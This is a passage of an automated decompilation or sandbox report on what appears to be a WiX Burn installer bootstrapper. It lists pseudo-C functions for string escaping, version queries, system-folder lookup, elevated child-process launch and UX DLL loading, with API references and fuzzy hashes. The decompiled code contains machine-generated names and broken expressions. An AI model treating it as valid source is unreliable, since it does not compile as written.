                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                  					E004380AB(_v12);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t52;
                                                                                                                                                                  			}












                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to append escape sequence., xrefs: 00403A3F
                                                                                                                                                                  • Failed to format escape sequence., xrefs: 00403A46
                                                                                                                                                                  • [\%c], xrefs: 00403A0B
                                                                                                                                                                  • Failed to copy string., xrefs: 00403A60
                                                                                                                                                                  • []{}, xrefs: 004039D6
                                                                                                                                                                  • Failed to append characters., xrefs: 00403A38
                                                                                                                                                                  • Failed to allocate buffer for escaped string., xrefs: 004039C3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscspnlstrlen
                                                                                                                                                                  • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                                                                                                                                  • API String ID: 2089742776-3250950999
                                                                                                                                                                  • Opcode ID: 495ffa6d981b11b877c2abaf443fbf9dcc5606f2cd8c00eb9e99a4dc1bb3fa4b
                                                                                                                                                                  • Instruction ID: 9e6a9a67940905496a81f88a00607bdc48433feab610c747ff1ef49166aee51d
                                                                                                                                                                  • Opcode Fuzzy Hash: 495ffa6d981b11b877c2abaf443fbf9dcc5606f2cd8c00eb9e99a4dc1bb3fa4b
                                                                                                                                                                  • Instruction Fuzzy Hash: 8521F773A00219BACB11AE649C42F9F7AAC9F08726F21116BF401B61C1DA7C9F019B9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                  			E0043710A(short* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				void* _v12;
                                                                                                                                                                  				int _v16;
                                                                                                                                                                  				int _t28;
                                                                                                                                                                  				void* _t31;
                                                                                                                                                                  				void* _t34;
                                                                                                                                                                  				int _t35;
                                                                                                                                                                  
                                                                                                                                                                  				_t35 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_t28 = GetFileVersionInfoSizeW(_a4,  &_v8);
                                                                                                                                                                  				if(_t28 != 0) {
                                                                                                                                                                  					L4:
                                                                                                                                                                  					_t34 = GlobalAlloc(0, _t28);
                                                                                                                                                                  					if(_t34 != 0) {
                                                                                                                                                                  						if(GetFileVersionInfoW(_a4, _v8, _t28, _t34) != 0) {
                                                                                                                                                                  							L9:
                                                                                                                                                                  							if(VerQueryValueW(_t34, 0x452c9c,  &_v12,  &_v16) != 0) {
                                                                                                                                                                  								L13:
                                                                                                                                                                  								_t31 = _v12;
                                                                                                                                                                  								_t12 = _t31 + 8; // 0xe90043b5
                                                                                                                                                                  								 *_a8 =  *_t12;
                                                                                                                                                                  								_t14 = _t31 + 0xc; // 0x11c
                                                                                                                                                                  								 *_a12 =  *_t14;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t35 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								if(_t35 >= 0) {
                                                                                                                                                                  									goto L13;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push(_t35);
                                                                                                                                                                  									_push(0x12d);
                                                                                                                                                                  									goto L12;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t35 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							if(_t35 >= 0) {
                                                                                                                                                                  								goto L9;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push(_t35);
                                                                                                                                                                  								_push(0x128);
                                                                                                                                                                  								L12:
                                                                                                                                                                  								_push("fileutil.cpp");
                                                                                                                                                                  								E004300D9(_t25);
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						GlobalFree(_t34);
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t35 = 0x8007000e;
                                                                                                                                                                  						_push(0x8007000e);
                                                                                                                                                                  						_push(0x124);
                                                                                                                                                                  						goto L3;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t35 =  <=  ? GetLastError() : _t17 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					if(_t35 >= 0) {
                                                                                                                                                                  						goto L4;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push(_t35);
                                                                                                                                                                  						_push(0x120);
                                                                                                                                                                  						L3:
                                                                                                                                                                  						_push("fileutil.cpp");
                                                                                                                                                                  						E004300D9(_t17);
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t35;
                                                                                                                                                                  			}











                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(00401CE2,00000000,00000000,00000000,00000000,?,00401CE2), ref: 00437127
                                                                                                                                                                  • GetLastError.KERNEL32(00401CE2,00000000,00000000,00000000,00000000,?,00401CE2), ref: 00437132
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,00000000,00401CE2,00000000,00000000,00000000,00000000,?,00401CE2), ref: 00437161
                                                                                                                                                                  • GetFileVersionInfoW.VERSION(00401CE2,00000000,00000000,00000000,?,00401CE2), ref: 00437182
                                                                                                                                                                  • GetLastError.KERNEL32(00401CE2,00000000,00000000,00000000,?,00401CE2), ref: 0043718B
                                                                                                                                                                  • VerQueryValueW.VERSION(00000000,00452C9C,00401CE2,?,00401CE2,00000000,00000000,00000000,?,00401CE2), ref: 004371B9
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00452C9C,00401CE2,?,00401CE2,00000000,00000000,00000000,?,00401CE2), ref: 004371C2
                                                                                                                                                                  • GlobalFree.KERNEL32 ref: 00437200
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$FileGlobalInfoVersion$AllocFreeQuerySizeValue
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 2342464106-2967768451
                                                                                                                                                                  • Opcode ID: 3815d32c301473eca3e0d1f546ce49212311d6eef8439676e2aaf84ac5b1cc40
                                                                                                                                                                  • Instruction ID: 2b78e4f95cf1851de82ac9c20f76e9d7113ea434e50c0d9b6e21df6510e867e1
                                                                                                                                                                  • Opcode Fuzzy Hash: 3815d32c301473eca3e0d1f546ce49212311d6eef8439676e2aaf84ac5b1cc40
                                                                                                                                                                  • Instruction Fuzzy Hash: 8D21F976A00224ABDB216B658C44FAFBAACEF4C360F105227FD41E7351D778CD0086E9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                                                  			E00402EF0(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				char _v528;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t10;
                                                                                                                                                                  				char* _t14;
                                                                                                                                                                  				signed short _t15;
                                                                                                                                                                  				signed short _t23;
                                                                                                                                                                  				long _t26;
                                                                                                                                                                  				signed short _t27;
                                                                                                                                                                  				void* _t38;
                                                                                                                                                                  				signed short _t40;
                                                                                                                                                                  				signed short _t43;
                                                                                                                                                                  				signed int _t47;
                                                                                                                                                                  
                                                                                                                                                                  				_t31 = __ecx;
                                                                                                                                                                  				_t10 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t10 ^ _t47;
                                                                                                                                                                  				_t37 = _a8;
                                                                                                                                                                  				_push(0x208);
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v528);
                                                                                                                                                                  				E004267C0(__ebx, __ecx, _a8, _t38, __eflags);
                                                                                                                                                                  				_t14 =  &_v528;
                                                                                                                                                                  				_push(0x104);
                                                                                                                                                                  				_push(_t14);
                                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                                  					_t15 = GetSystemDirectoryW();
                                                                                                                                                                  					__eflags = _t15;
                                                                                                                                                                  					if(_t15 != 0) {
                                                                                                                                                                  						goto L6;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t23 = GetLastError();
                                                                                                                                                                  						__eflags = _t23;
                                                                                                                                                                  						_t43 =  <=  ? _t23 : _t23 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						__eflags = _t43;
                                                                                                                                                                  						_t40 =  >=  ? 0x80004005 : _t43;
                                                                                                                                                                  						E004300D9(0x80004005, "variable.cpp", 0x67a, _t40);
                                                                                                                                                                  						_push("Failed to get 64-bit system folder.");
                                                                                                                                                                  						goto L11;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					__imp__GetSystemWow64DirectoryW();
                                                                                                                                                                  					if(_t14 != 0) {
                                                                                                                                                                  						L6:
                                                                                                                                                                  						__eflags = _v528;
                                                                                                                                                                  						if(_v528 == 0) {
                                                                                                                                                                  							L9:
                                                                                                                                                                  							_t40 = E00418DBD(_t37, _t37,  &_v528, 0);
                                                                                                                                                                  							__eflags = _t40;
                                                                                                                                                                  							if(_t40 < 0) {
                                                                                                                                                                  								_push("Failed to set system folder variant value.");
                                                                                                                                                                  								goto L11;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t40 = E00431BD3(_t31,  &_v528, 0x104);
                                                                                                                                                                  							__eflags = _t40;
                                                                                                                                                                  							if(_t40 >= 0) {
                                                                                                                                                                  								goto L9;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to backslash terminate system folder.");
                                                                                                                                                                  								goto L11;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t26 = GetLastError();
                                                                                                                                                                  						_t31 = 0;
                                                                                                                                                                  						_t27 =  !=  ? 0 : _t26;
                                                                                                                                                                  						if(_t27 == 0) {
                                                                                                                                                                  							goto L6;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t46 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t40 =  >=  ? 0x80004005 :  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							E004300D9(0x80004005, "variable.cpp", 0x673, _t40);
                                                                                                                                                                  							_push("Failed to get 32-bit system folder.");
                                                                                                                                                                  							L11:
                                                                                                                                                                  							_push(_t40);
                                                                                                                                                                  							E00430A57();
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return L004267AF(_t40, _v8 ^ _t47, _t37, _t40);
                                                                                                                                                                  			}


















                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 00402F31
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00402F3F
                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00402F80
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00402F8A
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to backslash terminate system folder., xrefs: 00402FDC
                                                                                                                                                                  • Failed to get 32-bit system folder., xrefs: 00402F79
                                                                                                                                                                  • variable.cpp, xrefs: 00402F6F, 00402FAE
                                                                                                                                                                  • Failed to set system folder variant value., xrefs: 00402FF8
                                                                                                                                                                  • Failed to get 64-bit system folder., xrefs: 00402FB8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryErrorLastSystem$Wow64
                                                                                                                                                                  • String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 2634638900-1590374846
                                                                                                                                                                  • Opcode ID: a6c69dccbbf2be1031db203f4067e8434cf5e9197eedcd5a4a0239263a270efe
                                                                                                                                                                  • Instruction ID: 3028cfd38fd9b0fa9bbf2cbcb5758e02e6dbb0d9081b2022e1500054c2941306
                                                                                                                                                                  • Opcode Fuzzy Hash: a6c69dccbbf2be1031db203f4067e8434cf5e9197eedcd5a4a0239263a270efe
                                                                                                                                                                  • Instruction Fuzzy Hash: 8521C532A4133567DB20A665AD09BAB72E89F08794F110277FD05F71C0EB78CD009AED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                  			E0040F502(void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				char _v16;
                                                                                                                                                                  				char _v20;
                                                                                                                                                                  				long _t26;
                                                                                                                                                                  				char* _t32;
                                                                                                                                                                  				void* _t42;
                                                                                                                                                                  				void* _t44;
                                                                                                                                                                  				void* _t47;
                                                                                                                                                                  				intOrPtr* _t48;
                                                                                                                                                                  				intOrPtr _t49;
                                                                                                                                                                  
                                                                                                                                                                  				_t47 = __edx;
                                                                                                                                                                  				_t26 = GetCurrentProcessId();
                                                                                                                                                                  				_t48 = _a8;
                                                                                                                                                                  				_push(_t26);
                                                                                                                                                                  				_t2 = _t48 + 4; // 0xe0458d50
                                                                                                                                                                  				_push( *_t2);
                                                                                                                                                                  				_push( *_t48);
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t49 = E00433CEA( &_v12, L"-q -%ls %ls %ls %u", L"burn.elevated");
                                                                                                                                                                  				if(_t49 >= 0) {
                                                                                                                                                                  					E00436186(_t42, _t47, __eflags,  &_v16,  &_v20);
                                                                                                                                                                  					__eflags = _v16 - 5;
                                                                                                                                                                  					if(__eflags < 0) {
                                                                                                                                                                  						L4:
                                                                                                                                                                  						_t32 = L"open";
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t32 = L"runas";
                                                                                                                                                                  						__eflags = _a12;
                                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                                  							goto L4;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					_t49 = E004362FF( &_v8, __eflags, _a4, _v12, _t32, 0, 0, _a16,  &_v8);
                                                                                                                                                                  					__eflags = _t49;
                                                                                                                                                                  					if(_t49 >= 0) {
                                                                                                                                                                  						 *((intOrPtr*)(_t48 + 8)) = GetProcessId(_v8);
                                                                                                                                                                  						_t44 = 0;
                                                                                                                                                                  						 *((intOrPtr*)(_t48 + 0xc)) = _v8;
                                                                                                                                                                  						_v8 = 0;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						E00430A57(_t49, "Failed to launch elevated child process: %ls", _a4);
                                                                                                                                                                  						goto L7;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to allocate parameters for elevated process.");
                                                                                                                                                                  					_push(_t49);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					L7:
                                                                                                                                                                  					_t44 = _v8;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t44 != 0) {
                                                                                                                                                                  					CloseHandle(_t44);
                                                                                                                                                                  					_v8 = 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                  					E004380AB(_v12);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t49;
                                                                                                                                                                  			}















                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,00000000,0000046C,?,00401414,00000000), ref: 0040F50B
                                                                                                                                                                  • GetProcessId.KERNEL32(000000FF,00000000,00000000,open,00000000,00000000,?,000000FF,00401414,?), ref: 0040F5A9
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F5C2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseCurrentHandle
                                                                                                                                                                  • String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
                                                                                                                                                                  • API String ID: 2815245435-1352204306
                                                                                                                                                                  • Opcode ID: 4e981767b1eb18263e4abf2fab9a3384bb8ad1aecc80daab52436225fa08a506
                                                                                                                                                                  • Instruction ID: 9dd29fa3c1bf901f7b5469797d6210ea94a2ede4352b721ee3dc12e956673635
                                                                                                                                                                  • Opcode Fuzzy Hash: 4e981767b1eb18263e4abf2fab9a3384bb8ad1aecc80daab52436225fa08a506
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E216872D00209BFDB11AF95DC519AEBBB8EF08706B10817BF904B2251D7389B149B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 15%
                                                                                                                                                                  			E004030ED(void* __edx, intOrPtr _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				signed short _v20;
                                                                                                                                                                  				signed short _v24;
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t9;
                                                                                                                                                                  				_Unknown_base(*)()* _t13;
                                                                                                                                                                  				signed short _t22;
                                                                                                                                                                  				intOrPtr _t25;
                                                                                                                                                                  				char* _t33;
                                                                                                                                                                  				void* _t34;
                                                                                                                                                                  				signed int _t38;
                                                                                                                                                                  
                                                                                                                                                                  				_t9 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t9 ^ _t38;
                                                                                                                                                                  				_t25 = _a8;
                                                                                                                                                                  				_t33 =  &_v28;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t13 = GetProcAddress(GetModuleHandleW(L"msi"), "DllGetVersion");
                                                                                                                                                                  				if(_t13 != 0) {
                                                                                                                                                                  					_v28 = 0x14;
                                                                                                                                                                  					_t34 =  *_t13( &_v28);
                                                                                                                                                                  					if(_t34 >= 0) {
                                                                                                                                                                  						asm("cdq");
                                                                                                                                                                  						_t34 = E00418E16(_t25, 0, (_v24 & 0x0000ffff) << 0x00000010 | _v20 & 0x0000ffff);
                                                                                                                                                                  						if(_t34 < 0) {
                                                                                                                                                                  							_push("Failed to set variant value.");
                                                                                                                                                                  							goto L6;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to get msi.dll version info.");
                                                                                                                                                                  						goto L6;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t22 = GetLastError();
                                                                                                                                                                  					_t37 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t34 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "variable.cpp", 0x621, _t34);
                                                                                                                                                                  					_push("Failed to find DllGetVersion entry point in msi.dll.");
                                                                                                                                                                  					L6:
                                                                                                                                                                  					_push(_t34);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				return L004267AF(_t34, _v8 ^ _t38, _t33, _t34);
                                                                                                                                                                  			}

















                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 00403117
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040311E
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00403128
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variant value., xrefs: 00403194
                                                                                                                                                                  • Failed to get msi.dll version info., xrefs: 00403170
                                                                                                                                                                  • variable.cpp, xrefs: 0040314C
                                                                                                                                                                  • DllGetVersion, xrefs: 0040310C
                                                                                                                                                                  • Failed to find DllGetVersion entry point in msi.dll., xrefs: 00403156
                                                                                                                                                                  • msi, xrefs: 00403111
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                  • String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
                                                                                                                                                                  • API String ID: 4275029093-842451892
                                                                                                                                                                  • Opcode ID: 61e93e2cf5fe21059742e6938a0019da0ffc838fbe178dce55be459690a90973
                                                                                                                                                                  • Instruction ID: 00c3173276fc620b4457567019cff447681b78f5feee3fbe466217bf40f687bc
                                                                                                                                                                  • Opcode Fuzzy Hash: 61e93e2cf5fe21059742e6938a0019da0ffc838fbe178dce55be459690a90973
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C11DA31A40725BBEB10ABB9AC45BBFB6E8AB0C751F10012BF901F7180D778990046ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 18%
                                                                                                                                                                  			E00408878(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                  				struct HINSTANCE__* _t9;
                                                                                                                                                                  				signed short _t15;
                                                                                                                                                                  				signed short _t18;
                                                                                                                                                                  				intOrPtr* _t21;
                                                                                                                                                                  				intOrPtr _t24;
                                                                                                                                                                  				void* _t25;
                                                                                                                                                                  
                                                                                                                                                                  				_t24 = _a4;
                                                                                                                                                                  				_t9 = LoadLibraryW( *( *((intOrPtr*)(_t24 + 4)) + 0x50));
                                                                                                                                                                  				 *(_t24 + 0xc) = _t9;
                                                                                                                                                                  				if(_t9 != 0) {
                                                                                                                                                                  					_t21 = GetProcAddress(_t9, "BootstrapperApplicationCreate");
                                                                                                                                                                  					if(_t21 != 0) {
                                                                                                                                                                  						_t5 = _t24 + 0x10; // 0x10
                                                                                                                                                                  						_t25 =  *_t21(_a8, _a12, _t5);
                                                                                                                                                                  						if(_t25 < 0) {
                                                                                                                                                                  							_push("Failed to create UX.");
                                                                                                                                                                  							goto L6;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t15 = GetLastError();
                                                                                                                                                                  						_t28 =  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t25 =  >=  ? 0x80004005 :  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "userexperience.cpp", 0x68, _t25);
                                                                                                                                                                  						_push("Failed to get BootstrapperApplicationCreate entry-point");
                                                                                                                                                                  						goto L6;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t18 = GetLastError();
                                                                                                                                                                  					_t31 =  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t25 =  >=  ? 0x80004005 :  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "userexperience.cpp", 0x64, _t25);
                                                                                                                                                                  					_push("Failed to load UX DLL.");
                                                                                                                                                                  					L6:
                                                                                                                                                                  					_push(_t25);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t25;
                                                                                                                                                                  			}










                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(?,00000000,?,004013CC,000000B8,?,0000001C,00000000,00000000,?,?,?,?,00401EA4,?,?), ref: 00408885
                                                                                                                                                                  • GetLastError.KERNEL32(?,004013CC,000000B8,?,0000001C,00000000,00000000,?,?,?,?,00401EA4,?,?), ref: 00408892
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 004088CA
                                                                                                                                                                  • GetLastError.KERNEL32(?,004013CC,000000B8,?,0000001C,00000000,00000000,?,?,?,?,00401EA4,?,?), ref: 004088D6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                  • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                                                                  • API String ID: 1866314245-2276003667
                                                                                                                                                                  • Opcode ID: 22fb72b810ae8fbde16b8a3797fc88ad88388fe9fc8be667d8966cac1321a6db
                                                                                                                                                                  • Instruction ID: 960b82d4b4fe11ee768066112e35dd7487824440bcb93e6e2eec702ee6f8a908
                                                                                                                                                                  • Opcode Fuzzy Hash: 22fb72b810ae8fbde16b8a3797fc88ad88388fe9fc8be667d8966cac1321a6db
                                                                                                                                                                  • Instruction Fuzzy Hash: 6811C632B40721ABDB256A69AD09B6B76D4EF08750F11513BFD45F7290EB39CC008AED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 84%
